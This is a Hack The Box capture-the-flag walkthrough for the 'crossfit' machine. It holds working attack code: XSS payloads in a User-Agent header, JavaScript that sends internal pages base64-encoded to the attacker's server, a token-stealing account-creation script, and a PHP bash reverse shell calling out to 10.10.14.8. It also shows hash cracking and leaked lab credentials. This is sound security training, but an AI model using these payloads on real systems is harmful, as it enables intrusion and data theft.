Hack-The-Box-walkthrough[crossfit]

introduce

OS: Linux
Difficulty: Insane
Points: 50
Release: 19 Sep 2020
IP: 10.10.10.208

User Blood haqpl 00 days, 15 hours, 52 mins, 14 seconds.
Root Blood haqpl 01 days, 00 hours, 25 mins, 20 seconds.

• 

• 

information gathering

first use nmap as usaul

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.208
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: Host: Cross; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port-80

There is a default apache web server page.

I use gobuster but nothing interesting found.

And also ftp anonymous login is not allowed.

So i run nmap again for a specific port.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# nmap -sC -sV -p 21 -vvv 10.10.10.208
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 2.0.8 or later
| ssl-cert: Subject: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US/emailAddress=info@gym-club.crossfit.htb
| Issuer: commonName=*.crossfit.htb/organizationName=Cross Fit Ltd./stateOrProvinceName=NY/countryName=US/emailAddress=info@gym-club.crossfit.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-30T19:16:46
| Not valid after:  3991-08-16T19:16:46
| MD5:   557c 36e4 424b 381e eb17 708a 6138 bd0f
| SHA-1: 25ec d2fe 6c9d 7704 ec7d d792 8767 4bc3 8d0e cbce
| -----BEGIN CERTIFICATE-----
| MIID0TCCArmgAwIBAgIUFlxL1ZITpUBfx69st7fRkJcsNI8wDQYJKoZIhvcNAQEL
| BQAwdzELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAk5ZMRcwFQYDVQQKDA5Dcm9zcyBG
| aXQgTHRkLjEXMBUGA1UEAwwOKi5jcm9zc2ZpdC5odGIxKTAnBgkqhkiG9w0BCQEW
| GmluZm9AZ3ltLWNsdWIuY3Jvc3NmaXQuaHRiMCAXDTIwMDQzMDE5MTY0NloYDzM5
| OTEwODE2MTkxNjQ2WjB3MQswCQYDVQQGEwJVUzELMAkGA1UECAwCTlkxFzAVBgNV
| BAoMDkNyb3NzIEZpdCBMdGQuMRcwFQYDVQQDDA4qLmNyb3NzZml0Lmh0YjEpMCcG
| CSqGSIb3DQEJARYaaW5mb0BneW0tY2x1Yi5jcm9zc2ZpdC5odGIwggEiMA0GCSqG
| SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDgibxJvtPny7Vee6M0BFBPFBohEQ+0zLDq
| LdkW/OSl4tfEdZYn6U5cNYKTyYJ8CuytGlMpFw5OgOBPATtBYoGrQZdlN+7LQwF+
| CZsedPs30ijAhygI7pM5S0hwiqdVReR/hhFHD/zry3M5+9NGeDLPgLbQG8qgPspv
| Y+ErCXXotxVI+VrTPfGkjPixfgUTYsEetrkmXlig0S2ukxmNs7HXkjli4Z+qpGrn
| mpFQokBE6RlD6VjxPzx0pfgK587s7F0/pIfXTHGfIOMnqXuLKBXsYIAEjJQxlLUt
| U3lb7aZdqIZnvhTuzuOxFUIe5dRWyfERyODEd5WUlwsbY4Qo2HhZAgMBAAGjUzBR
| MB0GA1UdDgQWBBTG3S2NuuXiSQ4dRvDnLqiWQdvY7jAfBgNVHSMEGDAWgBTG3S2N
| uuXiSQ4dRvDnLqiWQdvY7jAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUA
| A4IBAQB/tGKHZ9oXsqLGGW0wRRgCZj2adl1sq3S69e9R4yVQW7zU2Sw38CAA/O07
| MEgbqrzUI0c/T+Wb1D+gRamCUxSB7FXfMzGRhwUqMsLp8uGNlxyDcMU34ecRwOil
| r4jLmfeGyok1r8CFHg8Om1TeZfzNeVtkAkqf3XoIxbKQk4s779n/84FAtLkZNqyb
| cSv8nnClQQSlf42P3AiRBbwM1Cx9SyKq977sIwOzKTOM4NcSivNdtov+Pc0z+T9I
| 95SsqLKtO/8T0h6hgY6JQG1+A4ivnlZ8nqSFWYsnX10lJN2URlAwXUYuTw0vCMy+
| Xk0OmbR/oG052H02ZsmfJQhqPNF1
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: Host: Cross

So with the help of nmap we find 1 sub-domain Let’s add this in our /etc/hosts file.

nano /etc/hosts

10.10.10.208      gym-club.crossfit.htb

Let’s go to http://gym-club.crossfit.htb/.

After some enumeration i find a comment form let’s try something in that.

First i capture the request in my burp and try various thing like XSS.

I change User-Agent feild and comment feild to ping my python simpleHttpServer.

http://gym-club.crossfit.htb/blog-single.php

<script src="http://10.10.14.8:8001/"></script>

POST /blog-single.php HTTP/1.1

Host: gym-club.crossfit.htb

User-Agent: <script src="http://10.10.14.8:8001/"></script>

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 154

Origin: http://gym-club.crossfit.htb

Connection: close

Referer: http://gym-club.crossfit.htb/blog-single.php

Upgrade-Insecure-Requests: 1



name=lucifer11&email=1185151867%40qq.com&phone=17746608760&message=<script src="http://10.10.14.8:8001/"></script>&submit=submit

┌──(root💀kali)-[~]
└─# python -m SimpleHTTPServer 8001                                                                           
Serving HTTP on 0.0.0.0 port 8001 ...
10.10.10.208 - - [28/Nov/2020 08:19:27] "GET / HTTP/1.1" 200 -

Now i try everything but nothing work so think about other ways that we need to attack ftp.crossfit.htb.

But the question is where he find that subdomain.

After some hit and try i understand that we need to find that from localhost (using XSS) can see another vhost that only accepts resquest from the local machine and the host is ftp.crossfit.htb that thinking about.

• Create a HTTP Request in JS

With the help of this article i find my way to communicate with ftp.crossfit.htb.

So what we do now we create a .js file called luci.js that give the response page of the ftp.crossfit.htb in our python server.

Let’s try this real quick.

step 1

Create a file called luci.js

• luci.js

myhttpserver = 'http://10.10.14.8/'
targeturl = 'http://ftp.crossfit.htb/'

req = new XMLHttpRequest;
req.onreadystatechange = function() {
    if (req.readyState == 4) {
            req2 = new XMLHttpRequest;
            req2.open('GET', myhttpserver + btoa(this.responseText),false);
            req2.send();
        }
}
req.open('GET', targeturl, false);
req.send();

step 2

Open a python simple http server in your working directory were the luci.js file exist.

python3 -m http.server 80

Now capture the request of comment form and send it to the repeater tab and add the value that show in the image.

<script src="http://10.10.14.8/luci.js"></script>

burp request:

POST /blog-single.php HTTP/1.1

Host: gym-club.crossfit.htb

User-Agent: <script src="http://10.10.14.8/luci.js"></script>

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 93

Origin: http://gym-club.crossfit.htb

Connection: close

Referer: http://gym-club.crossfit.htb/blog-single.php

Upgrade-Insecure-Requests: 1



name=lucifer11&email=1185151867%40qq.com&phone=17746608760&message=%3Cscript%3E&submit=submit

Let’s send the request and check our python server.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [28/Nov/2020 08:45:54] "GET /luci.js HTTP/1.1" 200 -
10.10.10.208 - - [28/Nov/2020 08:45:55] code 404, message File not found
10.10.10.208 - - [28/Nov/2020 08:45:55] "GET /PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+RlRQIEhvc3RpbmcgLSBBY2NvdW50IE1hbmFnZW1lbnQ8L3RpdGxlPgogICAgPGxpbmsgaHJlZj0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvdHdpdHRlci1ib290c3RyYXAvNC4wLjAtYWxwaGEvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CjwvaGVhZD4KPGJvZHk+Cgo8YnI+CjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJjb2wtbGctMTIgbWFyZ2luLXRiIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icHVsbC1sZWZ0Ij4KICAgICAgICAgICAgICAgIDxoMj5GVFAgSG9zdGluZyAtIEFjY291bnQgTWFuYWdlbWVudDwvaDI+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwdWxsLXJpZ2h0Ij4KICAgICAgICAgICAgICAgIDxhIGNsYXNzPSJidG4gYnRuLXN1Y2Nlc3MiIGhyZWY9Imh0dHA6Ly9mdHAuY3Jvc3NmaXQuaHRiL2FjY291bnRzL2NyZWF0ZSI+IENyZWF0ZSBOZXcgQWNjb3VudDwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KCiAgICAKICAgIDx0YWJsZSBjbGFzcz0idGFibGUgdGFibGUtYm9yZGVyZWQiPgogICAgICAgIDx0cj4KICAgICAgICAgICAgPHRoPk5vPC90aD4KICAgICAgICAgICAgPHRoPlVzZXJuYW1lPC90aD4KICAgICAgICAgICAgPHRoPkNyZWF0aW9uIERhdGU8L3RoPgogICAgICAgICAgICA8dGggd2lkdGg9IjI4MHB4Ij5BY3Rpb248L3RoPgogICAgICAgIDwvdHI+CgogICAgICAgIAogICAgPC90YWJsZT4KCiAgICAKCjwvZGl2PgoKPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -

It give us a base64 string.

Let’s decode this and see what inside.

<!DOCTYPE html>

<html>
<head>
    <title>FTP Hosting - Account Management</title>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha/css/bootstrap.css" rel="stylesheet">
</head>
<body>

<br>
<div class="container">
        <div class="row">
        <div class="col-lg-12 margin-tb">
            <div class="pull-left">
                <h2>FTP Hosting - Account Management</h2>
            </div>
            <div class="pull-right">
                <a class="btn btn-success" href="http://ftp.crossfit.htb/accounts/create"> Create New Account</a>
            </div>
        </div>
    </div>

    
    <table class="table table-bordered">
        <tr>
            <th>No</th>
            <th>Username</th>
            <th>Creation Date</th>
            <th width="280px">Action</th>
        </tr>

        
    </table>

    

</div>

</body>
</html>

It’s a html code for ftp.crossfit.htb wepsite.

If you not conform Let’s open this in browser.

It’s a FTP Hosting - Account Management page.

Let’s create new user.

But first Let’s check what is the url when we click on create new account.

http://ftp.crossfit.htb/accounts/create

let’s add this in our luci.js and check how’s the page look on ftp.crossfit.htb/accounts/create

luci.js

myhttpserver = 'http://10.10.14.8/'
targeturl = 'http://ftp.crossfit.htb/accounts/create'

req = new XMLHttpRequest;
req.onreadystatechange = function() {
    if (req.readyState == 4) {
            req2 = new XMLHttpRequest;
            req2.open('GET', myhttpserver + btoa(this.responseText),false);
            req2.send();
        }
}
req.open('GET', targeturl, false);
req.send();

Let’s send the request again in burp.

And we got the response.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.208 - - [28/Nov/2020 08:55:42] "GET /luci.js HTTP/1.1" 200 -
10.10.10.208 - - [28/Nov/2020 08:55:42] code 404, message File not found
10.10.10.208 - - [28/Nov/2020 08:55:42] "GET /PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+RlRQIEhvc3RpbmcgLSBBY2NvdW50IE1hbmFnZW1lbnQ8L3RpdGxlPgogICAgPGxpbmsgaHJlZj0iaHR0cHM6Ly9jZG5qcy5jbG91ZGZsYXJlLmNvbS9hamF4L2xpYnMvdHdpdHRlci1ib290c3RyYXAvNC4wLjAtYWxwaGEvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CjwvaGVhZD4KPGJvZHk+Cgo8YnI+CjxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAKPGRpdiBjbGFzcz0icm93Ij4KICAgIDxkaXYgY2xhc3M9ImNvbC1sZy0xMiBtYXJnaW4tdGIiPgogICAgICAgIDxkaXYgY2xhc3M9InB1bGwtbGVmdCI+CiAgICAgICAgICAgIDxoMj5BZGQgTmV3IEFjY291bnQ8L2gyPgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9InB1bGwtcmlnaHQiPgogICAgICAgICAgICA8YSBjbGFzcz0iYnRuIGJ0bi1wcmltYXJ5IiBocmVmPSJodHRwOi8vZnRwLmNyb3NzZml0Lmh0Yi9hY2NvdW50cyI+IEJhY2s8L2E+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KPC9kaXY+CgoKPGZvcm0gYWN0aW9uPSJodHRwOi8vZnRwLmNyb3NzZml0Lmh0Yi9hY2NvdW50cyIgbWV0aG9kPSJQT1NUIj4KICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Il90b2tlbiIgdmFsdWU9IkJobURaQWlMN0JDc01kbnRvOXIwTnlyVW5yTldQcFhZRE1HbEVtQ08iPgogICAgIDxkaXYgY2xhc3M9InJvdyI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29sLXhzLTEyIGNvbC1zbS0xMiBjb2wtbWQtMTIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJmb3JtLWdyb3VwIj4KICAgICAgICAgICAgICAgIDxzdHJvbmc+VXNlcm5hbWU6PC9zdHJvbmc+CiAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0idXNlcm5hbWUiIGNsYXNzPSJmb3JtLWNvbnRyb2wiIHBsYWNlaG9sZGVyPSJVc2VybmFtZSI+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgIDxkaXYgY2xhc3M9ImNvbC14cy0xMiBjb2wtc20tMTIgY29sLW1kLTEyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICAgICAgICAgICAgICA8c3Ryb25nPlBhc3N3b3JkOjwvc3Ryb25nPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwYXNzIiBjbGFzcz0iZm9ybS1jb250cm9sIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJjb2wteHMtMTIgY29sLXNtLTEyIGNvbC1tZC0xMiB0ZXh0LWNlbnRlciI+CiAgICAgICAgICAgICAgICA8YnV0dG9uIHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tcHJpbWFyeSI+U3VibWl0PC9idXR0b24+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KCjwvZm9ybT4KCjwvZGl2PgoKPC9ib2R5Pgo8L2h0bWw+Cg== HTTP/1.1" 404 -

Again decode it and open in browser.

<!DOCTYPE html>

<html>
<head>
    <title>FTP Hosting - Account Management</title>
    <link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0-alpha/css/bootstrap.css" rel="stylesheet">
</head>
<body>

<br>
<div class="container">
    
<div class="row">
    <div class="col-lg-12 margin-tb">
        <div class="pull-left">
            <h2>Add New Account</h2>
        </div>
        <div class="pull-right">
            <a class="btn btn-primary" href="http://ftp.crossfit.htb/accounts"> Back</a>
        </div>
    </div>
</div>


<form action="http://ftp.crossfit.htb/accounts" method="POST">
    <input type="hidden" name="_token" value="BhmDZAiL7BCsMdnto9r0NyrUnrNWPpXYDMGlEmCO">
     <div class="row">
        <div class="col-xs-12 col-sm-12 col-md-12">
            <div class="form-group">
                <strong>Username:</strong>
                <input type="text" name="username" class="form-control" placeholder="Username">
            </div>
        </div>
        <div class="col-xs-12 col-sm-12 col-md-12">
            <div class="form-group">
                <strong>Password:</strong>
                <input type="password" name="pass" class="form-control" placeholder="Password">
            </div>
        </div>
        <div class="col-xs-12 col-sm-12 col-md-12 text-center">
                <button type="submit" class="btn btn-primary">Submit</button>
        </div>
    </div>

</form>

</div>

</body>
</html>

There is two field username and password.

But the tricky part is if you see the source code there is a hidden value called _token which value dynamically change so if we create a payload to register user we need to grep the _token value from web page.

After some hit and try create a payload to register user.

createuser.js

myhttpserver = 'http://10.10.14.8'
targeturl = 'http://ftp.crossfit.htb/accounts/create'
username = 'luci'
password = 'lucifer11'

req = new XMLHttpRequest;
req.withCredentials = true;
req.onreadystatechange = function() {
    if (req.readyState == 4) {
        req2 = new XMLHttpRequest;
        req2.open('GET', myhttpserver + btoa(this.responseText), false);
        req2.send();
    }
}
req.open('GET', targeturl, false);
req.send();

regx = /token" value="(.*)"/g;
token = regx.exec(req.responseText)[1];

var params = '_token=' + token + '&username=' + username + '&pass=' + password + '&submit=submit'
req.open('POST', "http://ftp.crossfit.htb/accounts", false);
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req.send(params);

Now send the req in burp with this createuser.js file like this.

<script src="http://10.10.14.8/createuser.js"></script>

POST /blog-single.php HTTP/1.1

Host: gym-club.crossfit.htb

User-Agent: <script src="http://10.10.14.8/createuser.js"></script>

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 93

Origin: http://gym-club.crossfit.htb

Connection: close

Referer: http://gym-club.crossfit.htb/blog-single.php

Upgrade-Insecure-Requests: 1



name=lucifer11&email=1185151867%40qq.com&phone=17746608760&message=%3Cscript%3E&submit=submit

Let’s check the python listner.

and receive the response:

10.10.10.208 - - [28/Nov/2020 09:05:09] "GET /createuser.js HTTP/1.1" 200 -

And i use lftp to connect with ftp.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# lftp
lftp :~> set ftp:ssl-force true
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> set ssl:verify-certificate no 
lftp 10.10.10.208:~> login luci
密码: 
lftp luci@10.10.10.208:~> ls
drwxrwxr-x    2 33       1002         4096 Sep 21 09:45 development-test
drwxr-xr-x   13 0        0            4096 May 07  2020 ftp
drwxr-xr-x    9 0        0            4096 May 12  2020 gym-club
drwxr-xr-x    2 0        0            4096 May 01  2020 html
lftp luci@10.10.10.208:/>

We find another sub-domain called: development-test.crossfit.htb

Let’s add this in our /etc/hosts file.

If you closely see that we have read and write access of development-test directory.

So that mean we can upload a php reverse shell and execute it with our rev.js file.

step 1

Create a file called rev.php.

rev.php

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.8/9988 0>&1'") ?>

step 2

Create another file called rev.js that will execute our rev.php.

rev.js

req = new XMLHttpRequest;
req.open('GET',"http://development-test.crossfit.htb/rev.php");
req.send();

step 3

Start you python server on the same directory were all files exist and netcat Listener.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# ls
createuser.js  luci.js  rev.js  rev.php
┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

┌──(root💀kali)-[~]
└─# nc -lvp 9988
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9988
Ncat: Listening on 0.0.0.0:9988

step 4

upload the rev.php in ftp development-test directory.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# lftp                                                                                                      
lftp :~> set ftp:ssl-force true
lftp :~> connect 10.10.10.208
lftp 10.10.10.208:~> set ssl:verify-certificate no
lftp 10.10.10.208:~> login luci
密码: 
lftp luci@10.10.10.208:~> ls
drwxrwxr-x    2 33       1002         4096 Sep 21 09:45 development-test
drwxr-xr-x   13 0        0            4096 May 07  2020 ftp
drwxr-xr-x    9 0        0            4096 May 12  2020 gym-club
drwxr-xr-x    2 0        0            4096 May 01  2020 html
lftp luci@10.10.10.208:/> cd development-test
lftp luci@10.10.10.208:/development-test> ls
lftp luci@10.10.10.208:/development-test> put rev.php
69 bytes transferred in 12 seconds (6 B/s)       
lftp luci@10.10.10.208:/development-test> ls
-rw-r--r--    1 1002     1002           69 Nov 28 14:30 rev.php

step 5

Go to burp repeater tab and edit it to rev.js and send it:

POST /blog-single.php HTTP/1.1

Host: gym-club.crossfit.htb

User-Agent: <script src="http://10.10.14.8/rev.js"></script>

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 90

Origin: http://gym-club.crossfit.htb

Connection: close

Referer: http://gym-club.crossfit.htb/blog-single.php

Upgrade-Insecure-Requests: 1



name=dcasdc&email=casdcasdcd%40qq.com&phone=17746608760&message=%3Cscript%3E&submit=submit

Now let’s see our netcat listner

10.10.10.208 - - [28/Nov/2020 09:29:23] "GET /rev.js HTTP/1.1" 200 -

┌──(root💀kali)-[~]
└─# nc -lvp 9988
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9988
Ncat: Listening on 0.0.0.0:9988
Ncat: Connection from 10.10.10.208.
Ncat: Connection from 10.10.10.208:37118.
id
bash: cannot set terminal process group (712): Inappropriate ioctl for device
bash: no job control in this shell
www-data@crossfit:/var/www/development-test$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@crossfit:/var/www/development-test$ whoami
whoami
www-data

Boom we got the shell as www-data.

Now let’s run the linPEAS.

• LinPEAS - Linux Privilege Escalation Awesome Script

www-data@crossfit:/var/www/development-test$ ./linpeas.sh > info
./linpeas.sh > info
ls: cannot access '/etc/hosts.denied': No such file or directory
grep: write error: Broken pipe
www-data@crossfit:/var/www/development-test$

After analyze the output i found two interesting things.

First is crontabs

They run send_updates.php file that’s look suspicious.

MAILTO=""
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

*  *    * * *   isaac   /usr/bin/php /home/isaac/send_updates/send_updates.php

Second is 2 hashes in the linPEAS result.

[+] Looking for specific hashes inside files - less false positives (limit 70)
/etc/ansible/playbooks/adduser_hank.yml:$6$e20D6nUeTJOIyRio$A777Jj8tk5.sfACzLuIqqfZOCsKTVCfNEQIbH79nZf09mM.Iov/pzDCE8xNZZCM9MuHKMcjqNUd8QUEzC1CZG/
/var/www/ftp/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi

Let’s try to crack this hashes

I save this hashes in a file called hash

hash

$6$e20D6nUeTJOIyRio$A777Jj8tk5.sfACzLuIqqfZOCsKTVCfNEQIbH79nZf09mM.Iov/pzDCE8xNZZCM9MuHKMcjqNUd8QUEzC1CZG/
$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi

Let’s crack it with john.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# john -w=/usr/share/wordlists/rockyou.txt hash
Warning: only loading hashes of type "sha512crypt", but also saw type "bcrypt"
Use the "--format=bcrypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
powerpuffgirls   (?)
1g 0:00:00:05 DONE (2020-11-28 09:51) 0.1919g/s 4618p/s 4618c/s 4618C/s tajmahal..hunibuni
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And we got the password called powerpuffgirls

And this hash is for hank user that we see in linPEAS result.

Let’s try to ssh in and got our user.txt flag.

┌──(root💀kali)-[~/hackthebox/machine/crossfit]
└─# ssh hank@10.10.10.208
hank@10.10.10.208's password: 
Linux crossfit 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Mon Sep 21 05:46:24 2020 from 10.10.14.2
hank@crossfit:~$ ls
user.txt
hank@crossfit:~$ cat user.txt
d6ce5237244a14992edde7f0b62b6076

• 

Privilege escalation

Let’s check crontabs first.

hank@crossfit:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

MAILTO=""
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)                                                                                                
# |  .------------- hour (0 - 23)                                                                                                  
# |  |  .---------- day of month (1 - 31)                                                                                          
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...                                                                          
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat                                             
# |  |  |  |  |                                                                                                                    
# *  *  *  *  * user-name command to be executed                                                                                   
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly                                                                
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )                                
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )                               
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )                              
*  *    * * *   isaac   /usr/bin/php /home/isaac/send_updates/send_updates.php

there is a send_updates.php file which we see in the previous linPEAS result.

Let’s check what inside the send_updates.php.

hank@crossfit:~$ cat /home/isaac/send_updates/send_updates.php
<?php
/***************************************************
 * Send email updates to users in the mailing list *
 ***************************************************/
require("vendor/autoload.php");
require("includes/functions.php");
require("includes/db.php");
require("includes/config.php");
use mikehaertl\shellcommand\Command;

if($conn)
{
    $fs_iterator = new FilesystemIterator($msg_dir);

    foreach ($fs_iterator as $file_info)
    {
        if($file_info->isFile())
        {
            $full_path = $file_info->getPathname(); 
            $res = $conn->query('SELECT email FROM users');
            while($row = $res->fetch_array(MYSQLI_ASSOC))
            {
                $command = new Command('/usr/bin/mail');
                $command->addArg('-s', 'CrossFit Club Newsletter', $escape=true);
                $command->addArg($row['email'], $escape=true);

                $msg = file_get_contents($full_path);
                $command->setStdIn('test');
                $command->execute();
            }
        }
        unlink($full_path);
    }
}

cleanup();
?>

We can check that if the mikehaertl library does not protect what it reads in the database … so we can pass it a command.

Looking in the library repository (you can see the version in the composer.json file) there is a problem in this issue # 44

• escapeArgs option is not working properly

now we need ftp credentials to be able to inject the commands into the database so that the php script can read them and run them.

Before doing enumeration I saw the credentials in /var/www/gym-club/db.php

hank@crossfit:/home/isaac/send_updates$ cat /var/www/gym-club/db.php 
$dbhost = "localhost";
$dbuser = "crossfit";
$dbpass = "oeLoo~y2baeni";
$db = "crossfit";
$conn = new mysqli($dbhost, $dbuser, $dbpass, $db);
hank@crossfit:/home/isaac/send_updates$

Now we only need one thing ftp credentials.

I run linPEAS again and found a interesting file:

[+] Readable files belonging to root and readable by me but not world readable
-r--r----- 1 root hank 33 Nov 28 07:54 /home/hank/user.txt                                                                                                                                                                                 
-rw-r----- 1 root admins 384 Sep 27  2017 /etc/pam.d/chfn
-rw-r----- 1 root admins 92 Sep 27  2017 /etc/pam.d/newusers
-rw-r----- 1 root admins 119 Oct  9  2019 /etc/pam.d/vmtoolsd
-rw-r----- 1 root admins 1221 May 11  2020 /etc/pam.d/common-auth
-rw-r----- 1 root admins 4944 May  7  2020 /etc/pam.d/login
-rw-r----- 1 root admins 317 Jan 29  2020 /etc/pam.d/systemd-user
-rw-r----- 1 root admins 138 Jan 10  2019 /etc/pam.d/runuser-l
-rw-r----- 1 root admins 1208 May 11  2020 /etc/pam.d/common-account
-rw-r----- 1 root admins 319 May  1  2020 /etc/pam.d/vsftpd.orig
-rw-r----- 1 root admins 2256 May 11  2020 /etc/pam.d/su
-rw-r----- 1 root admins 647 May 12  2020 /etc/pam.d/vsftpd
-rw-r----- 1 root admins 137 Jan 10  2019 /etc/pam.d/su-l
-rw-r----- 1 root admins 90 May  7  2020 /etc/pam.d/chpasswd
-rw-r----- 1 root admins 1440 May 11  2020 /etc/pam.d/common-password
-rw-r----- 1 root admins 1154 May 11  2020 /etc/pam.d/common-session-noninteractive
-rw-r----- 1 root admins 2133 May  6  2020 /etc/pam.d/sshd
-rw-r----- 1 root admins 1189 May 11  2020 /etc/pam.d/common-session
-rw-r----- 1 root admins 520 Feb 14  2019 /etc/pam.d/other
-rw-r----- 1 root admins 580 May  7  2020 /etc/pam.d/chsh
-rw-r----- 1 root admins 92 Sep 27  2017 /etc/pam.d/passwd
-rw-r----- 1 root admins 606 Oct 11  2019 /etc/pam.d/cron
-rw-r----- 1 root admins 143 Jan 10  2019 /etc/pam.d/runuser

Let’s see the content inside the file.

hank@crossfit:~$ cat /etc/pam.d/vsftpd
auth sufficient pam_mysql.so user=ftpadm passwd=8W)}gpRJvAmnb host=localhost db=ftphosting table=accounts usercolumn=username passwdcolumn=pass crypt=3
